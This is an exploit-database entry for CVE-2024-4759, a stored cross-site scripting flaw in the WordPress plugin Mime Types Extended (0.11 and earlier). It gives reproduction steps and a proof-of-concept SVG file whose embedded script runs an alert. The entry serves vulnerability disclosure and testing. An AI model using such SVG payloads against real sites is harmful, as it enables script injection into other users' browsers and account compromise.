Exploit for Mime Types Extended <= 0.11 - Author+ Stored XSS via SVG Upload CVE-2024-4759

Name: Exploit for Mime Types Extended <= 0.11 - Author+ Stored XSS via SVG Upload CVE-2024-4759
Rating: 5 (43 reviews)

2024-06-04 | CVSS 6.1

## https://sploitus.com/exploit?id=WPEX-ID:1C7547FA-539A-4890-A94D-C57B3D025507
1. As an admin, enable SVG uploads at https://example.com/wp-admin/options-general.php?page=mime-types-extended
2. As an author, upload a malicious SVG via the Media Library. Example SVG:

```
<svg xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert("xss");</script>
</svg>
```